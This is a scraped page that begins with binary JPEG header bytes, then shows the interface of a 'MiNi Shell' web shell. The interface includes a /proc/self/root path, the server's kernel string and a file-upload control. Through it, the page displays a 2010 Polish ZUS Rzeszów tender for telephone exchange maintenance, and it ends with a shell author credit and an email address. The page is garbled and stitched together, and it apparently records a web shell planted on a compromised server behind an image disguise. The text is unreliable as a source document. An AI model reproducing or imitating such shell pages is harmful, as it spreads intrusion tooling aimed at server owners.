JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100630/170589-N-2010.html

<p class="kh_header"><b>Rzeszów: Wykonywanie konserwacji central telefonicznych w O/ZUS w Rzeszowie i podległych Inspektoratach</b><br>
<b>Numer ogłoszenia: 170589 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie konserwacji central telefonicznych w O/ZUS w Rzeszowie i podległych Inspektoratach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja ,przeglądy, i serwis  central telefonicznych znajdujących się na wyposażeniu O/ZUS w Rzeszowie oraz w podległych mu Inspektoratach i BiurzeTerenowym wg wykazu zamieszczonego poniżej, wraz z instalacją teletechniczną wewnętrzną na odcinku do centrali i aparatami telefonicznymi cyfrowymi.
1. O/ZUS w Rzeszowie ul. 8-go Marca 3 centrala SLICAN NTC 1248.1 
2. O/ZUS w Rzeszowie ul. 8-go Marca 3 centrala SILCAN CCT 1668                                              
3. O/ZUS w Rzeszowie ul. 8-go Marca 3 centrala SLICAN CTT 11668                                         
4. O/ZUS w Rzeszowie Al. Niepodległości 3 centrala EACA 16/3 
5. Inspektorat ZUS w Przeworsku ul. Dworcowa 1 centrala Alcatel 4400 
6. Inspektorat ZUS w Jarosławiu ul. Słowackiego 21 centrala Alcatel  4100 
7. Inspektorat ZUS w Przemyślu ul. Brodzińskiego 6 centrala Mikrotel 150 
8. Inspektorat ZUS w Mielcu ul. Sikorskiego 4centrala Hicom 130 
9. Inspektorat ZUS w Stalowej Woli ul. Popiełuszki 8 centrala Slican CCA 2720 
10. Inspektorat ZUS w Tarnobrzegu ul. Sienkiewicza 145D centrala Slican CCA 2720 
11. Inspektorat ZUS w Leżajsku ul. Mickiewicza 24 centrala Alcatel 4200 
12. Biuro Terenowe w Lubaczowie ul. Legionów 4 centrala Digitex DCT        80                                     
13. O/ZUS w Rzeszowie Al. Piłsudskiego 12 centrala ERIKSON BUSINES  PHONE 250 Warunki konserwacji i serwisu 1. Czynności  obejmują w szczególności: 
a) utrzymanie w stałej sprawności całego systemu telekomunikacyjnego, 
b) przeglądy i konserwacje wykonywane z częstotliwością gwarantującą zachowanie stałej sprawności systemu - minimum jeden raz na kwartał, 
c) naprawę lub wymianę uszkodzonych części, podzespołów gwarantujących prawidłowe działanie łączności telefonicznej, 
d) w razie potrzeby dostarczanie części zamiennych, 
e) aktualizację bądź zmianę oprogramowania centrali w przypadku zestawienia nowych przyłączy lub w innych przypadkach zgłoszonych przez Zleceniodawcę, 
f) doradztwo w zakresie rozwiązań telekomunikacyjnych, 
g) testowanie sprawności pracy centrali telefonicznej poprzez sprawdzenie połączeń wewnętrznych między aparatami, połączeń przychodzących miejskich z udziałem awiz po wszystkich łączach miejskich, połączeń wychodzących miejskich po wszystkich liniach miejskich, 
h) nadzorowanie poprawności wydruków z programów taryfikujących i poprawności rejestrowania połączeń, 
i) w przypadku występowania w danej jednostce ZUS aparatów cyfrowych sprawdzanie stanu ich oprogramowania i ich przeprogramowanie zgodnie z potrzebami Zamawiającego, 
j) aktualizacja oprogramowania taryfikującego w przypadku zmiany Operatora, zmian stawek za połączenia lub zmian numeracji. 
2. Ewentualne awarie centrali telefonicznych i instalacji teletechnicznej będą usuwane przez Zleceniobiorcę do 24 godzin od chwili zgłoszenia awarii. Do czasu naprawy nie wlicza się dni wolnych od pracy u Zleceniodawcy, niedziel i świąt. Zamawiający dopuszcza zwiększenie czasu naprawy do 7 dni w przypadku awarii uznanych przez Zleceniodawcę za nie mające dużego wpływu na łączność telekomunikacyjną w ZUS. W przypadku braku możliwości zakupu części zamiennej, koniecznej do naprawy, Zleceniodawca na pisemny wniosek Zleceniobiorcy, zawierający uzasadnienie wydłużenie usunięcia czasu awarii ,może ustalić inny termin jej usunięcia. 
3. Po usunięciu awarii Zleceniobiorca gwarantuje prawidłowe parametry jakościowe działania całego systemu. 
4. Zleceniobiorca wykonanie czynności określonych oraz wykonanie przeglądu lub konserwacji potwierdzi raportem serwisowym . 
5. Przeglądy  i konserwacje wykonywane będą przez Zleceniobiorcę (osobiście lub przez jego jednostkę organizacyjną /oddział, filię/ w dni powszednie ( poniedziałek - piątek ) w godzinach pracy Zleceniodawcy, bez konieczności otrzymania zgłoszenia od Zleceniodawcy A/ datę wykonania przeglądu Zleceniobiorca uzgodni z pracownikami komórek Administracyjno Gospodarczych Oddziału ZUS w Rzeszowie , Inspektoratów ZUS w Przeworsku, Jarosławiu, Przemyślu, Leżajsku, Tarnobrzegu, Stalowej Woli, Mielcu oraz Biura Terenowego w Lubaczowie B/ Zleceniodawca zapewni obecność swego pracownika podczas przeglądu, 
6.  W przypadku wykrycia usterek podczas przeglądu Zleceniobiorca rozpocznie ich usuwanie w tym samym czasie co dokonuje przeglądu, 
7. W cenę  wliczone są wszystkie koszty Zleceniobiorcy związane z wykonaniem umowy, w tym koszty dojazdu w celu wykonania przeglądu i konserwacji central,  a także koszty robocizny związane z wykonywaniem napraw , koszty robocizny podczas montażu nowych podzespołów, demontażu istniejących, koszty robocizny związane z przeprogramowaniem central i aparatów telefonicznych cyfrowych. Powyższa kwota nie uwzględnia kosztów zakupu nowych podzespołów, nowych wersji oprogramowania, oraz napraw podzespołów, w przypadku gdy brak jest na rynku nowego, lub jego naprawa jest ze względów ekonomicznych bardziej opłacalna niż zakup nowego. Koszt wykonania naprawy należy każdorazowo uzgodnić ze Zleceniodawcą. W przypadku gdy, cena naprawy zaoferowana  przez Zleceniobiorcę nie odpowiada Zleceniodawcy , Zleceniodawca ma prawo do wyboru innego Wykonawcy.    
8. Zleceniodawca dokona zapłaty za wszystkie wykonane prace na konto Zleceniobiorcy w terminie 30 dni od daty otrzymania faktury VAT. Za datę zapłaty uważa się datę obciążenia rachunku bankowego Zleceniodawcy. 
9. Faktury będą wystawiane raz na trzy miesiące po wykonaniu przeglądu i konserwacji lub naprawy. 
10. Podstawą wystawienia faktury przez Zleceniobiorcę będzie podpisany przez przedstawiciela Zleceniodawcy protokół naprawy , wykonania przeglądu i konserwacji. 
11. Na wykonane naprawy Zleceniobiorca udziela 3 miesięcznej gwarancji na zasadach określonych przepisami kodeksu cywilnego. 
12.W przypadku wymiany centrali telefonicznej na nową zamawiający zastrzega sobie prawo do rezygnacji z postanowień umowy w tej części umowy. 
13. Wykonawca może dokonać oględzin central telefonicznych w miejscu użytkowania, tak aby mógł właściwie określić cenę oferty, po wcześniejszym uzgodnieniu terminu z Naczelnikiem lub Zastępcą Naczelnika Wydziału Administracyjno Gospodarczego O/ZUS w Rzeszowie.            
 Pozostałe postanowienia 
1) Zleceniobiorca płaci Zleceniodawcy kary umowne o wartości netto: 
a) za odstąpienie od umowy przez Zleceniodawcę wskutek okoliczności, za które odpowiada Zleceniobiorca - w wysokości 10 000,00 zł. 
b) w przypadku opóźnienia w naprawie sprzętu za każde 24 godziny opóźnienia - 1000,00 zł 
2) Zleceniodawca płaci Zleceniobiorcy kary umowne za odstąpienie od umowy przez Zleceniobiorcę wskutek okoliczności, za które odpowiada Zleceniodawca w wysokości  10 000,00 zł. 
3) Z pozostałych tytułów strony ponoszą odpowiedzialność odszkodowawczą na zasadach ogólnych a ponadto Strony mogą dochodzić na zasadach ogólnych odszkodowania przewyższającego wysokość zastrzeżonych kar umownych, o których mowa w ust. 1. 
4) Zleceniodawca zastrzega sobie możliwość potrącenia kar umownych z należnego Zleceniobiorcy wynagrodzenia. 
Sposób obliczania ceny oferty 
1. Cena oferty jest ceną ryczałtową. Wykonawca w przedstawionej ofercie cenowej winien zaoferować cenę wyrażoną w złotych polskich (PLN) kompletną, jednoznaczną  i ostateczną łącznie z podatkiem VAT naliczonym zgodnie z obowiązującymi przepisami w tym zakresie. 
2. Wszelkie, ewentualne, udzielone przez Wykonawcę rabaty, bonifikaty, promocje, upusty muszą być uwzględnione w cenie oferty 
3.	W cenę  wliczone muszą być wszystkie koszty Zleceniobiorcy związane z wykonaniem przedmiotu zamówienia i umowy, w tym koszty dojazdu w celu wykonania przeglądu i konserwacji central,  a także koszty robocizny związane z wykonywaniem napraw (bez kosztów dojazdu) , koszty robocizny podczas montażu nowych podzespołów, demontażu istniejących, koszty robocizny związane z przeprogramowaniem central i aparatów telefonicznych cyfrowych. Powyższa kwota nie powinna uwzględniać kosztów zakupu nowych podzespołów, nowych wersji oprogramowania, oraz napraw podzespołów, w przypadku gdy brak jest na rynku nowego, lub jego naprawa jest ze względów ekonomicznych bardziej opłacalna niż zakup nowego. 
4.	Koszty dojazdu w celu wykonania napraw ( poza dojazdami na przeglądy okresowe) będą naliczane na podstawie aktualnie obowiązujących w chwili dokonywania naprawy stawek określonych w Rozporządzeniu Ministra Infrastruktury z dnia 25.03.2002 w sprawie warunków ustalania oraz sposobu dokonywania zwrotu kosztów używania do celów służbowych samochodów, motocykli i motorowerów nie będących własnością pracodawcy (Dz. U Nr 27 poz. 271)Zamawiający nie dopuszcza możliwości składania ofert częściowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.33.41.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIe dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty
2. oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w  art.  22 ust. 1 ustawy - Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy w przypadku, gdy konieczność wprowadzenia tych zmian wynika ze zmian bezwzględnych przepisów prawa, w oparciu o które realizowana jest umowa, wystąpienia siły wyższej oraz zmian funkcjonalno - organizacyjnych w ZUS np. zmiana central telefonicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zaklad Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12, 35-075 Rzeszów (ul. Siemiradzkiego 8 pok. nr 1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2010 godzina 10:00, miejsce: Zaklad Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12, 35-075 Rzeszów pok. 23 - Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com